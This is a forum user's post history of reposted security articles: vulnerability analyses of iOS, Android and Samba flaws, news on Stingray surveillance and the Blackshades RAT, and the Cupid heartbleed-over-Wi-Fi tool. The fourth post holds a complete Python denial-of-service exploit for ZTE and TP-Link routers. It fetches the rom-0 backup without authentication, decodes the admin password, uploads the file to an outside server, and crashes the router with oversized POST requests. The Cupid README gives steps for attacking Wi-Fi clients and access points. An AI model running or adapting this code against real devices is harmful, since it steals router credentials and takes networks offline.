Jump to content

thehat

Members
  • Posts

    47
  • Joined

  • Last visited

  • Days Won

    2

Posts posted by thehat

  1. Reflecting on Recent iOS and Android Security Updates

    By zLabs
    Friday, Feb 12 2016 at 04:00

     

    By: Zuk Avraham, Joshua Drake, Nikias Bassen from ZimperiumzLabs

    The last thirty days proven to be yet another exciting time for the mobile security ecosystem. Apple and Google released updates for their respective mobile operating systems that fix several critical issues — including some in the kernel that may be exploited remotely.

    Last Monday, Google released its monthly Nexus security bulletin. We are thrilled to see that the tradition that started after Stagefright’s discovery is a monthly routine now and other vendors are following suit (including Samsung). Blackberry indicated that they are very serious about security issues as well. We welcome Android vendors to reply to the ZHA thread to update the carriers on their plans to release an update addressing the February fixes by Google. We’ll take a closer look at the bulletin and some of the issues fixed later in this post.

    iOS 9.2.1

    In the recent iOS update (9.2.1 – published on January 19th), Apple patched what we initially classified as 7 critical, 3 high, and 2 moderate severity vulnerabilities. These include at least five remotely exploitable vulnerabilities (CVE-2016-1723 through CVE-2016-1727) and at least one critical local kernel vulnerability triggerable from userland with low privileges (CVE-2016-1719). CVE-2015-7995 also appears to be exposed remotely, but determining exploitability will require further investigation. The following graph and table summarize the mentioned issues.

    CVE Component Impact Severity
    CVE-2016-1717 DiskImage Kernel Code Execution High
    CVE-2016-1719 IOHIDFamily Kernel Code Execution Critical
    CVE-2016-1720 IOKit Kernel Code Execution High
    CVE-2016-1721 Kernel Kernel Code Execution High
    CVE-2015-7995 libxslt Remote Code Execution Critical
    CVE-2016-1722 syslogd Code Execution w/EOP High
    CVE-2016-1723, CVE-2016-1724, CVE-2016-1725, CVE-2016-1726, CVE-2016-1727 WebKit Remote Code Execution Critical
    CVE-2016-1728 WebKit CSS Privacy Leak Moderate
    CVE-2016-1730 WebSheet Privacy Leak Moderate

    Screen Shot 2016-02-11 at 3.23.28 PM

    Android

    The February Nexus Security Bulletin encompasses 10 security issues including 5 critical, 4 high, and 1 moderate severity vulnerabilities. This includes 2 remotely exploitable kernel code execution vulnerabilities (CVE-2016-0801, CVE-2016-0802) and 2 remotely exploitable vulnerabilities exposed through Android’s mediaserver (CVE-2016-0803 in Stagefright, CVE-2016-0804). You can see the bulletin in its entirety here, but the following graph and table summarize the disclosed issues.

    Screen Shot 2016-02-11 at 3.24.26 PM

    CVE Component Impact Severity
    CVE-2016-0801

     

    CVE-2016-0802

    Broadcom Wi-Fi Driver Remote Code Execution Critical
    CVE-2016-0803

     

    CVE-2016-0804

    Mediaserver Remote Code Execution Critical
    CVE-2016-0805 Qualcomm Performance Module Elevation of Privilege Critical
    CVE-2016-0806 Qualcomm Wi-Fi Driver Elevation of Privilege Critical
    CVE-2016-0807 Debugger Daemon Elevation of Privilege Critical
    CVE-2016-0808 Minikin Denial of Service High
    CVE-2016-0809 Wi-Fi Elevation of Privilege High
    CVE-2016-0810 Mediaserver Elevation of Privilege High
    CVE-2016-0811 libmediaplayerservice Information Disclosure High
    CVE-2016-0812

     

    CVE-2016-0813

    Setup Wizard Elevation of Privilege Moderate

    While privilege escalation issues can be used by local apps or by remote exploits, attackers still need to gain initial code execution on the device to exploit those. With SELinux being enforced more strictly, kernel vulnerabilities are becoming more important (see our 2016 predictions []).

    Fortunately for the attackers (and unfortunately for us), we suspect that several additional security bugs lurk within Android device specific drivers and kernels. Further, the value of information disclosure vulnerabilities should not be underestimated. For example, CVE-2016-0811 may help attackers defeat security mitigations such as ASLR by leaking address space layout details. Combining several less severe issues together in a chain allows attackers to accomplish full compromise reliably. We expect this practice to remain a trend for the foreseeable future.

    As promised, Google updated the advisory within 48 hours with links to the AOSP commits that fixed the issues. It’s Interesting that several issues correspond to commits first released to the public in January. Unfortunately, this form of partial disclosure tends to give attackers that monitor code pushes a head start — especially when targeting 3rd party Android devices. On the bright side, that means up-to-date Nexus users were protected for an extra month before the official public disclosure. Let’s take a closer look at the relevant code changes for each issue.

    Analyzing the bugs

    The Broadcom Wi-Fi Driver remote kernel code execution vulnerabilities are the most interesting bugs disclosed this month. Although Google did not link to any commits for these two vulnerabilities, the Linux kernel is released under the GNU Public License which requires that source code be made available publicly. Shortly after the release, Security Researcher Ralf Philipp-Weinmann what we believe to be the related commits. The changes most relevant to CVE-2016-0801 and CVE-2016-0802 follow.

    We performed a cursory analysis of CVE-2016-0802 (full diffhere) and determined that several new validations were added checking packet lengths. However, we were unable to confirm that any ill effects would result from using nefarious values for the now-validated parameters. CVE-2016-0801 tells a different — and quite scary — story. See the following commit details.

    2As you can see, the committer himself declared these issuesexploitable buffer overflows straight away. Looking at the code sheds additional light on the subject.

    drivers/net/wireless/bcmdhd/wl_cfg80211.c [diff]:

    3In both cases, validation is added to prevent copying more data than the size of the destination buffer. Further, both destination buffers are located on the kernel stack. Because the stack contains crucial items such as the return address and — in the case of the kernel — the thread_info structure, exploiting such overflows is thought to be much easier.

    The next logical question is if and how these areas of code can be reached by an attacker. The bulletin states, “These vulnerabilities can be triggered when the attacker and the victim are associated with the same network.” However, our quick analysis of the code suggests (unconfirmed) that it may be possible to trigger these vulnerabilities without being associated at all. The following code is responsible for initializing a table of handlers that is used when various events occur.

    ====
    9765 static void wl_init_event_handler(struct bcm_cfg80211 *cfg)
    9781     cfg->evt_handler[WLC_E_ACTION_FRAME_RX] = wl_notify_rx_mgmt_frame;
    9782     cfg->evt_handler[WLC_E_PROBREQ_MSG] = wl_notify_rx_mgmt_frame;
    9783     cfg->evt_handler[WLC_E_P2P_PROBREQ_MSG] = wl_notify_rx_mgmt_frame;
    … 
    9790     cfg->evt_handler[WLC_E_PFN_NET_FOUND] = wl_notify_pfn_status;
    ====

    The first three presented entries correspond with the first change in the diff. The wl_notify_rx_mgmt_frame function callswl_validate_wps_ie, which contains the buffer overflow. (and also has other callers that have not been investigated). The event IDs (the part in brackets) include probe requests and action frames. This is quite interesting because probe requests are one of the very first packets sent during association. If an Android device enabled the portable hotspot feature, this vulnerability could potentially be exposed to everyone within range of the Wi-Fi radio.

    The final presented event handler entry deals with scheduled scans. The wl_notify_pfn_status function callswl_notify_sched_scan_results, which contains the buffer overflow. Although we are still investigating, this functionality also sounds a lot like it could expose the vulnerability to any attacker within Wi-Fi range of a vulnerable device.

    After the Broadcom Wi-Fi driver, the next most interesting vulnerabilities in the bulletin relate to a subject near and dear to our hearts — Android’s media processing. CVE-2016-0803 fixes two integer overflows in libstagefright that were classified as critical RCE. The bugs existed within the SOFTMPEG4Encoder and functions. In both cases, the issue is an integer overflow occurring when dealing with multiplication involving the mWidth and mHeight parameters. This overflow was patched with two commits [] [2] that add a sanitization check prior to allocating 1.5 x mWidth x mHeight bytes in the process’ heap. The relevant changes follow.

    4

    5

    CVE-2016-0803 affect devices running: Android 4.4.4, 5.0, 5.1.1, 6.0 and 6.0.1

    This issue is not without caveats, however. Since it exists within a codec, the victim would need to play back a malicious media file for an attacker trigger the vulnerability. While not all possible ways of accessing media have been investigated, Google Chrome on Android blocks automatic playback of HTML5 video by default (see here). As with most things Android, your mileage may vary depending on the specific device or application dealing with rich media. We encourage developers (especially those working on devices and browsers) to investigate and reconsider the decision to enable auto-play functionality.

    Another quirk with this vulnerability is that it appears to live within encoder functionality. It’s not presently clear how an attacker would exercise an encoder remotely, but we can’t rule it out either.

    The other critical RCE, vulnerability in mediaserver that is not related to libstagefright is CVE-2016-0804. It affects devices running Android 5.0, 5.1.1, 6.0 and 6.0.1. It was fixed by re-initializing the mDrmManagerClient member variable to NULL when cleaning up withinNuPlayer::GenericSource::notifyPreparedAndCleanup as shown below.

    frameworks/av / media/libmediaplayerservice/nuplayer/GenericSource.cpp

    6

    Fixes of this nature often prevent using stale data later in the lifetime of the process. One of the security researchers on the team of people that reported the issue that this issue was a use-after-free problem triggered when processing a DRM-protected media file. Presumably the attack vector here is media within the browser. It’s not clear if playback is required here, but given the name of the vulnerable function it’s probably not.

    Conclusions

    To summarize, both iOS and Android are improving their security from month to month but both OSes still expose users to remotely exploitable bugs. It wouldn’t come as a surprise if more such vulnerabilities were discovered already or in the future. From a preliminary analysis of the bugs, the security of most available devices not running the latest version is alarming. Determined attackers such as professional malware authors and nation states couldn’t be happier with smartphones’ lack of updates and the amount of remotely exploitable vulnerabilities.

     

    Sursa: https://blog.zimperium.com/reflecting-on-recent-ios-and-android-security-updates/

    • Upvote 1
    • Downvote 1
  2. Samba Remote Code Execution Vulnerability – CVE-2015-0240

    The Samba team reported CVE-2015-0240 last February 23, 2015. This vulnerability is very difficult to exploit and we are not aware of successful exploitation. However, it is quite interesting from the point for view of detection. There are two important facts:

    The vulnerability resides in the Netlogon Remote Protocol implementation of Samba which is a very high-level application protocol that can be used over different transports configurations.

    To execute the vulnerable code the attacker doesn’t need be authenticated and can use many ways to launch the attacks because of the previous point. This is very motivating for attackers as they can find ways to bypass Intrusion Prevention System (IPS).

    There is a very good public description about the vulnerability, which can be found at this link. In this post, we will discuss it from the point of view of involved protocols and possible attack surfaces.

    Vulnerability description

    The vulnerability resides in the Netlogon Remote Protocol implementation of Samba, specifically in the method NetrServerPasswordSet. The Netlogon Remote Protocol was implemented for interoperability with Microsoft Windows environments and for simulating Primary Domain Controllers. Using the Netlogon Remote Protocol Windows and Linux machines can be part of the Samba PDC domain even without the use of Active Directory. The method NetrServerPasswordSet is used to change the machine account password in a Samba domain.

    The method NetrServerPasswordSet is implemented in _netr_ServerPasswordSet() in the source file samba\source3\rpc_server\netlogon\srv_netlog_nt.c. The “creds” pointer is passed into netr_creds_server_step_check() without initialization. The following figure shows the vulnerable code section:

    sambablog_figure1.png

    Figure 1. Vulnerable code section

    The triggering conditions can be different for Samba v3 and Samba v4 as pointed in this analysis. The attacker can control “computer_name” and “credentials” to reach the vulnerable code section making this vulnerability as possibly exploitable.

    There is a public POC triggering the vulnerable code. Running this POC and doing dynamic analysis shows that effectively the method _netr_ServerPasswordSet is called. The following figure shows the resumed call graph of Samba.

    sambablog_figure2.png

    Figure 2. Call graph of Samba

    Running Samba with high level debugging can allow us to get more runtime information. Example of a command:

    smbd –D –S /etc/samba/smb.conf -d 10

    The following figure shows a section of the resulting log after running the POC.

    sambablog_figure3.png

    After some more lines we got:

    sambablog_getline.png

    This error message is logged by the function schannel_fetch_session_key_tdb and returns the error with NT_STATUS_OBJECT_NAME_NOT_FOUND. This function is called by shannel_check_creds_state.

    sambablog_figure4.png

    Figure 4. The error NT_STATUS_OBJECT_NAME_NOT_FOUND

    The error NT_STATUS_OBJECT_NAME_NOT_FOUND will force _netr_ServerPasswordSet to free the “creds” pointer. Looking at the network packets in the following figure we can see the Netlogon Protocol using the transport RPC over SMB.

    sambablog_figure5.png

    Figure 5. Netlogon Protocol using the transport RPC over SMB

    And this is one important point regarding to the attack detection. The Netlogon protocol is a high-level application protocol and can use two transport types: RPC over SMB and RPC over TCP/IP. The next section discusses more about this topic.

    Attack Delivery Mechanisms

    The Netlogon Remote Protocol is a very high level application protocol that can run on different protocol stack configurations. The following figure shows it.

    figure-6_3.jpg

    Figure 6. Netlogon Protocol runs on different protocol stack configurations

    Figure 6 shows that theoretically, an attacker can use two stack configurations to reach the vulnerable code. They are: RPC over TCP/IP and RPC over SMB. These two configurations will use different network ports and communication mechanisms. This is a panacea for implementing attacks bypassing IPS. But even more interesting is the case over SMB where the NetrServerPasswordSet can be called using several SMB commands and at the same time the parameters to the method can be encrypted and unencrypted. The following figure shows other ways to call NetrServerPasswordSet.

    figure7_2.jpg

    Figure 7. Other ways to call NetrServerPasswordSet

    Conclusion

    The vulnerability it is not easy to exploit and we are not aware of public exploits until now. However, the attack can be implemented in many different ways and the fact that it is not required to be authenticated makes it easy for the attackers.

    Implementing the protection requires coverage of multiple protocol stack configurations and multi commands over SMB.

    Sursa: Samba Remote Code Execution Vulnerability – CVE-2015-0240

  3. Not Just the NSA, Even the Local Cops Are Tracking You

    Across the whole of America, you are continuously being monitored by local police forces using a secretive technology without any warrant, while you are completely oblivious to this and thinking that it’s just the NSA, according to media reports.

    Local police are supported and encouraged by the government through latest technology assistance to vacuum up massive cellphone data, and the government is doing all it possibly could do to keep it under wraps, according to English daily The Guardian.

    “The Obama administration has been quietly advising local police not to disclose details about surveillance technology they are using to sweep up basic cellphone data from entire neighborhoods,” said The Associated Press.

    not-just-the-nsa-even-the-local-cops-are-tracking-you-2.jpg

    Stingrays, cell site simulators or International Mobile Subscriber Identity catchers, have been utilized by the government to conduct surveillance indiscriminately. These devices act as fake cellphone towers and can be easily mounted on a mobile police truck. They can be instructed to force all cellphones within their range to connect to them and divulge identifying information, which makes the tracking an easy game for the cops even when you are not making a call.

    The device is strong enough to penetrate the walls of homes and offices and collect information about the locations, phone’s identities, electronic serial numbers, directions and strength of phone’s signal as well as phone’s communications, i.e., the phone numbers they call to.

    Learn how Stingray works.

    And when the local cops do not have Stingrays for some reasons, they collect the information from cellphone service providers. These technologies are not cheap and in cases when the government fails to provide them with the devices, it is the Defense Department and Homeland Security that grants them with USD 400,000 to purchase it from contractors like Harris Corporation that makes the Stingray brand.

    This invasive surveillance has already been at odds with the civil liberties crowd and now several news agencies have revealed how the Obama administration is trying hard to keep its latest tool for mass surveillance a secret.

    “These extreme secrecy efforts are in relation to very controversial, local government surveillance practices using highly invasive technology. If public participation means anything, people should have the facts about what the government is doing to them,” said Nathan Freed Wessler, a staff attorney with the American Civil Liberties Union (ACLU).

    The tactics used by the government to keep Stingray away from journalists and public is sometimes very disturbing, noted the ACLU staff attorney. In one particular incident, the ACLU was initially promised the information on Stingrays, but when the staff went down to the police station to collect it, they were informed that the US Marshals had hidden it elsewhere.

    However, there is a silver lining; metadata tracking and mass collection of data may be forced to change. Recently, ACLU won a historic victory in the 11th Circuit Court of Appeals (serving Florida, Albama and Georgia. The court ruled that police requires a warrant from a judge before it proceeds with extraction of data from your cell through a cell tower.

    Sursa: Not Just the NSA, Even the Local Cops Are Tracking You | Hack Read

  4. ZTE and TP-Link RomPager DoS

    Introduction

    I think by now you know the security issues disclosed related to TP-Link routers. I’ve noticed that some ZTE and TP-Link routers have the same firmware which is “FwVer:3.11.2.175_TC3086 HwVer:T14.F7_5.0”. I was curious to test the web application and I found out that the embedded server which is “RomPager” cannot handle fairly large POST requests.

    Tested Routers:

    ZTE ZXV10 W300

    TP-Link TD-W8901G

    TP-Link TD-W8101G

    TP-Link TD-8840G

    TP-Link TD-8817

    Vulnerability Information

    The /Forms/tools_test_1 page uses a POST request to send the IP address to ping. We can take advantage of this page for our exploit. You may find other places as well, but this place is quite good for developing an exploit.

    HyAzraG.png

    But instead of the actual IP address if we send a large buffer the server crashes and the router restarts.

    pb2zG3o.png

    Of course we can do this remotely but still the router uses HTTP Basic authentication to access it’s resources. It means we need to know the router’s password rather than the default password ‘admin’.

    How can we achieve this? It’s simple as you all know that there is a rom-0 router backup file disclosure without any authentication we can decrypt the password and send our malicious POST requests and crash the router.

    POST /Forms/tools_test_1 HTTP/1.1

    Host: 192.168.1.1

    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

    Accept-Language: en-US,en;q=0.5

    Accept-Encoding: gzip, deflate

    Referer: http://192.168.1.1/maintenance/tools_test.htm

    Authorization: Basic YWRtaW46bG9s

    Connection: keep-alive

    Content-Type: application/x-www-form-urlencoded

    Content-Length: 93

    Proof of Concept

    I’ve developed an automated exploit for this. The usage is

    ./dos.py -i [internal or external IP]

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-

    # Exploit Title: ZTE and TP-Link RomPager DoS Exploit
    # Date: 10-05-2014
    # Server Version: RomPager/4.07 UPnP/1.0
    # Tested Routers: ZTE ZXV10 W300
    # TP-Link TD-W8901G
    # TP-Link TD-W8101G
    # TP-Link TD-8840G
    # Firmware: FwVer:3.11.2.175_TC3086 HwVer:T14.F7_5.0
    # Tested on: Kali Linux x86
    #
    # Notes: Please note this exploit may contain errors, and
    # is provided "as it is". There is no guarantee
    # that it will work on your target router(s), as
    # the code may have to be adapted.
    # This is to avoid script kiddie abuse as well.
    #
    # Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only.
    # Author takes no responsibility for any kind of damage you cause.
    #
    # Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
    # Dedicate to Nick Knight and Hood3dRob1n
    #
    # ./dos.py -i 192.168.1.1

    import os
    import re
    import sys
    import time
    import urllib
    import base64
    import httplib
    import urllib2
    import requests
    import optparse
    import telnetlib
    import subprocess
    import collections
    import unicodedata

    class BitReader:

    def __init__(self, bytes):
    self._bits = collections.deque()

    for byte in bytes:
    byte = ord(byte)
    for n in xrange(8):
    self._bits.append(bool((byte >> (7-n)) & 1))

    def getBit(self):
    return self._bits.popleft()

    def getBits(self, num):
    res = 0
    for i in xrange(num):
    res += self.getBit() << num-1-i
    return res

    def getByte(self):
    return self.getBits(8)

    def __len__(self):
    return len(self._bits)

    class RingList:

    def __init__(self, length):
    self.__data__ = collections.deque()
    self.__full__ = False
    self.__max__ = length

    def append(self, x):
    if self.__full__:
    self.__data__.popleft()
    self.__data__.append(x)
    if self.size() == self.__max__:
    self.__full__ = True

    def get(self):
    return self.__data__

    def size(self):
    return len(self.__data__)

    def maxsize(self):
    return self.__max__

    def __getitem__(self, n):
    if n >= self.size():
    return None
    return self.__data__[n]

    def filter_non_printable(str):
    return ''.join([c for c in str if ord(c) > 31 or ord(c) == 9])


    def banner():
    return '''

    _/_/_/ _/_/_/
    _/ _/ _/_/ _/
    _/ _/ _/ _/ _/_/
    _/ _/ _/ _/ _/
    _/_/_/ _/_/ _/_/_/

    '''
    def dos(host, password):
    while (1):
    url = 'http://' +host+ '/Forms/tools_test_1'
    parameters = {
    'Test_PVC' : 'PVC0',
    'PingIPAddr' : '\101'*2000,
    'pingflag' : '1',
    'trace_open_flag' : '0',
    'InfoDisplay' : '+-+Info+-%0D%0A'
    }

    params = urllib.urlencode(parameters)

    req = urllib2.Request(url, params)
    base64string = base64.encodestring('%s:%s' % ('admin', password)).replace('\n', '')
    req.add_header("Authorization", "Basic %s" %base64string)
    req.add_header("Content-type", "application/x-www-form-urlencoded")
    req.add_header("Referer", "http://" +host+ "/maintenance/tools_test.htm")
    try:
    print '[~] Sending Payload'
    response = urllib2.urlopen(req, timeout=1)
    sys.exit(0)

    except:
    flag = checkHost(host)
    if flag == 0:
    print '[+] The host is still up and running'
    else:
    print '[~] Success! The host is down'
    sys.exit(0)
    break

    def checkHost(host):
    if sys.platform == 'win32':
    c = "ping -n 2 " + host
    else:
    c = "ping -c 2 " + host

    try:
    x = subprocess.check_call(c, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    time.sleep(1)
    return x

    except:
    pass

    def checkServer(host):
    connexion = httplib.HTTPConnection(host)
    connexion.request("GET", "/status.html")
    response = connexion.getresponse()
    server = response.getheader("server")
    connexion.close()
    time.sleep(2)
    if server == 'RomPager/4.07 UPnP/1.0':
    return 0
    else:
    return 1

    def checkPassword(host):
    print '[+] Checking for default password'
    defaultpass = 'admin'
    tn = telnetlib.Telnet(host, 23, 4)
    tn.read_until("Password: ")
    tn.write(defaultpass + '\n')
    time.sleep(2)
    banner = tn.read_eager()
    banner = regex(len(defaultpass)*r'.'+'\w+' , banner)
    tn.write("exit\n")
    tn.close()
    time.sleep(4)
    if banner == 'Copyright':
    print '[+] Default password is being used'
    dos(host, defaultpass)
    else:
    print '[!] Default Password is not being used'
    while True:
    msg = str(raw_input('[?] Decrypt the rom-0 file locally? ')).lower()
    try:
    if msg[0] == 'y':
    password = decodePasswordLocal(host)
    print '[*] Router password is: ' +password
    dos(host, password)
    break
    if msg[0] == 'n':
    password = decodePasswordRemote(host)
    print '[*] Router password is: ' +password
    dos(host, password)
    break
    else:
    print '[!] Enter a valid choice'
    except Exception, e:
    print e
    continue


    def decodePasswordRemote(host):
    fname = 'rom-0'
    if os.path.isfile(fname) == True:
    os.remove(fname)
    urllib.urlretrieve ("http://"+host+"/rom-0", fname)
    # If this URL goes down you might have to find one and change this function.
    # You can also use the local decoder. It might have few errors in getting output.
    url = 'http://198.61.167.113/zynos/decoded.php' # Target URL
    files = {'uploadedfile': open('rom-0', 'rb') } # The rom-0 file we wanna upload
    data = {'MAX_FILE_SIZE': 1000000, 'submit': 'Upload rom-0'} # Additional Parameters we need to include
    headers = { 'User-agent' : 'Python Demo Agent v1' } # Any additional Headers you want to send or include

    res = requests.post(url, files=files, data=data, headers=headers, allow_redirects=True, timeout=30.0, verify=False )
    res1 =res.content
    p = re.search('rows=10>(.*)', res1)
    if p:
    passwd = found = p.group(1)
    else:
    password = 'NotFound'
    return passwd

    def decodePasswordLocal(host):
    # Sometimes this might output a wrong password while finding the exact string.
    # print the result as mentioned below and manually find out
    fname = 'rom-0'
    if os.path.isfile(fname) == True:
    os.remove(fname)
    urllib.urlretrieve ("http://"+host+"/rom-0", fname)
    fpos=8568
    fend=8788
    fhandle=file('rom-0')
    fhandle.seek(fpos)
    chunk="*"
    amount=221
    while fpos < fend:
    if fend-fpos < amount:
    amount = amount
    data = fhandle.read(amount)
    fpos += len(data)

    reader = BitReader(data)
    result = ''

    window = RingList(2048)

    while True:
    bit = reader.getBit()
    if not bit:
    char = reader.getByte()
    result += chr(char)
    window.append(char)
    else:
    bit = reader.getBit()
    if bit:
    offset = reader.getBits(7)
    if offset == 0:
    break
    else:
    offset = reader.getBits(11)

    lenField = reader.getBits(2)
    if lenField < 3:
    lenght = lenField + 2
    else:
    lenField <<= 2
    lenField += reader.getBits(2)
    if lenField < 15:
    lenght = (lenField & 0x0f) + 5
    else:
    lenCounter = 0
    lenField = reader.getBits(4)
    while lenField == 15:
    lenField = reader.getBits(4)
    lenCounter += 1
    lenght = 15*lenCounter + 8 + lenField

    for i in xrange(lenght):
    char = window[-offset]
    result += chr(char)
    window.append(char)

    result = filter_non_printable(result).decode('unicode_escape').encode('ascii','ignore')
    # In case the password you see is wrong while filtering, manually print it from here and findout.
    #print result
    if 'TP-LINK' in result:
    result = ''.join(result.split()).split('TP-LINK', 1)[0] + 'TP-LINK';
    result = result.replace("TP-LINK", "")
    result = result[1:]

    if 'ZTE' in result:
    result = ''.join(result.split()).split('ZTE', 1)[0] + 'ZTE';
    result = result.replace("ZTE", "")
    result = result[1:]

    if 'tc160' in result:
    result = ''.join(result.split()).split('tc160', 1)[0] + 'tc160';
    result = result.replace("tc160", "")
    result = result[1:]
    return result

    def regex(path, text):
    match = re.search(path, text)
    if match:
    return match.group()
    else:
    return None

    def main():
    if sys.platform == 'win32':
    os.system('cls')
    else:
    os.system('clear')
    try:
    print banner()
    print '''
    [*] ZTE and TP-Link RomPager Denial of Service Exploit
    [*] Author: Osanda Malith Jayathissa
    [*] Follow @OsandaMalith
    [!] Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only.
    [!] Author takes no responsibility for any kind of damage you cause.

    '''
    parser = optparse.OptionParser("usage: %prog -i <IP Address> ")
    parser.add_option('-i', dest='host',
    type='string',
    help='Specify the IP to attack')
    (options, args) = parser.parse_args()

    if options.host is None:
    parser.print_help()
    exit(-1)

    host = options.host
    x = checkHost(host)

    if x == 0:
    print '[+] The host is up and running'
    server = checkServer(host)
    if server == 0:
    checkPassword(host)
    else:
    print ('[!] Sorry the router is not running RomPager')
    else:
    print '[!] The host is not up and running'
    sys.exit(0)

    except KeyboardInterrupt:
    print '[!] Ctrl + C detected\n[!] Exiting'
    sys.exit(0)
    except EOFError:
    print '[!] Ctrl + D detected\n[!] Exiting'
    sys.exit(0)

    if __name__ == "__main__":
    main()
    #EOF

    Prevention

    To prevent from this attack you can port forward port 80 to a unused IP of your network

    qdTF2Yn.png

    Sursa: ZTE and TP-Link RomPager DoS | Blog of Osanda Malith

  5. ## Cupid 0.1

    ## Author: Luis Grangeia

    ## lgrangeia@sysvalue.com

    ## twitter.com/lgrangeia

    # INTRODUCTION

    Cupid is a pair of patches for hostapd-2.1 and wpa_supplicant-2.1 to exploit

    heartbleed on Wireless networks that use EAP Authentication methods based on

    TLS (specifically OpenSSL)

    Please see presentation slides for a simple introduction to cupid:

    Luis Grangeia, Partner and security services manager at Sysvalue s.a.

    # COMPILATION

    Get wpa_supplicant-2.1 and/or hostapd-2.1, apply the respective patch and

    compile. I don't recommend doing a "make install" as you'll be replacing

    your systems binaries with non-functional copies (functional only for exploiting

    heartbleed).

    # USAGE

    Both patches come with a "heartbleed.conf" file that can be used to tweak

    behaviour. It must be present and placed on the same directory you're running

    the binary. Refer to the file for details.

    --> wpa_supplicant:

    Use the included test_wpasupplicant.conf and change the ssid to the network

    you're wanting to test heartbleed for.

    Fire up wireshark or tcpdump on the interface to check for TLS heartbeat

    requests/responses. I usually do:

    # airmon-ng start wlan0

    and then monitor the whole thing on the mon0 interface (use filter 'EAP || SSL'

    for a better picture).

    fire up wpa_supplicant:

    ./wpa_supplicant -i wlan0 -dd -c ~/testconfs/test_wpasupplicant.conf

    Look at the output of wireshark to see if the network you're attacking is

    vulnerable.

    --> hostapd

    Use the included test_hostapd.conf. You may have to set up certificates and an

    empty eap_user file. I've included these for reference as well.

    Fire up wireshark as described above.

    Note that you need a wireless adapter supporting host AP mode.

    fire up hostapd:

    ./hostapd -d test_hostapd.conf

    Then try to connect to the "bleedingheart" network with your mobile device or

    laptop, and it will try to heartbleed it. You can put any login/password

    combination.

    To see if the patch works just install a vulnerable OpenSSL version and try to

    exploit your local copy of wpa_supplicant or a fresh install of hostapd.

    ### FUTURE WORK

    Please let me know if you find vulnerable devices and give me their version and

    if possible a packet dump of the actual attack.

    TODO:

    - Code is still very incomplete, just a PoC

    - Does not decrypt the heartbeat response if encrypted (not the case if

    pre-handshake)

    - Should output the heartbeat responses to a file

    - Test more devices/networks!

    Sursa: https://github.com/lgrangeia/cupid

  6. Meet “Cupid,” the Heartbleed attack that spawns “evil” Wi-Fi networks

    Open source code also attacks devices connecting to wireless networks.

    heartbleed_cupid_img1.png

    It just got easier to exploit the catastrophic Heartbleed vulnerability against wireless networks and the devices that connect to them thanks to the release last week of open source code that streamlines the process of plucking passwords, e-mail addresses, and other sensitive information from vulnerable routers and connected clients.

    Dubbed Cupid, the code comes in the form of two software extensions. The first gives wireless networks the ability to deploy "evil networks" that surreptitiously send malicious packets to connected devices. Client devices relying on vulnerable versions of the OpenSSL cryptography library can then be forced to transmit contents stored in memory. The second extension runs on client devices. When connecting to certain types of wireless networks popular in corporations and other large organizations, the devices send attack packets that similarly pilfer data from vulnerable routers.

    The release of Cupid comes eight weeks after the disclosure of Heartbleed, one of the most serious vulnerabilities to ever hit the Internet. The flaw, which existed for more than two years in OpenSSL, resides in "heartbeat" functions designed to keep a transport layer security (TLS) connection alive over an extended period of time.

    Heartbleed is best known for giving end users the ability to pluck data out of vulnerable servers. But it turns out that the bug can be used to the same effect against virtually any device running an unpatched version of OpenSSL. Cupid streamlines the process of exploiting devices connecting over wireless networks that are secured using the extended authentication protocol (EAP), which many large organizations use to password-protect access.

    "This is basically the same attack as Heartbleed, based on a malicious heartbeat packet," Luis Grangeia, a partner and security services manager at SysValue and the creator of Cupid, wrote in a blog post published Friday. "Like the original attack, which happens on regular TLS connections over TCP, both clients and servers can be exploited and memory can be read off processes on both ends of the connection. The difference in this scenario is that the TLS connection is being made over EAP, which is an authentication framework/mechanism used in Wireless networks. It’s also used in other situations, including wired networks that use 802.1x Network Authentication and peer to peer connections."

    Grangeia said a client attacking a router doesn't need to have a valid password, although a valid username is sometimes required. That requirement isn't much of a hurdle, however, since usernames are transmitted unencrypted, making them easy for an attacker to sniff over the air. Malicious networks running Cupid need no user credentials to attack vulnerable clients. Among the clients that remain vulnerable are handsets running versions 4.1.0 and 4.1.1 of Google's Android mobile operating system.

    The researcher said he hasn't tested vulnerable routers to see exactly what kind of memory contents they will divulge in a Heartbleed attack. "Most of the memory is zeroed out, but cursory inspection found interesting stuff on both vulnerable clients and servers," he wrote. "I can speculate that most likely the private key of the certificate used on the TLS connection is in memory. What can also be in memory is the user credentials used for authenticating the connection."

    Most home networks are probably safe from Cupid since home and small office routers typically use Wi-Fi Protected Access without EAP for authentication. Wireless devices in corporations and other large organizations may be more susceptible, since EAP-capable routers often don't receive updates in a timely fashion. Any smartphone or other type of client is vulnerable if it's running wireless software that relies on an old version of OpenSSL.

    Sursa: Meet “Cupid,” the Heartbleed attack that spawns “evil” Wi-Fi networks | Ars Technica

  7. The U.S. Justice Department today announced a series of actions against more than 100 people accused of purchasing and using “Blackshades,” a password-stealing Trojan horse program designed to infect computers throughout the world to spy on victims through their web cameras, steal files and account information, and log victims’ key strokes. While any effort that discourages the use of point-and-click tools for ill-gotten gains is a welcome development, the most remarkable aspect of this crackdown is that those who were targeted in this operation lacked any clue that it was forthcoming.

    To be sure, Blackshades is an effective and easy-to-use tool for remotely compromising and spying on your targets. Early on in its development, researchers at CitzenLab discovered that Blackshades was being used to spy on activists seeking to overthrow the regime in Syria.

    The product was sold via well-traveled and fairly open hacker forums, and even included an active user forum where customers could get help configuring and wielding the powerful surveillance tool. Although in recent years a license to Blackshades sold for several hundred Euros, early versions of the product were sold via PayPal for just USD $40.

    In short, Blackshades was a tool created and marketed principally for buyers who wouldn’t know how to hack their way out of a paper bag. From the Justice Department’s press release today:

    “After purchasing a copy of the RAT, a user had to install the RAT on a victim’s computer – i.e., “infect” a victim’s computer. The infection of a victim’s computer could be accomplished in several ways, including by tricking victims into clicking on malicious links or by hiring others to install the RAT on victims’ computers.

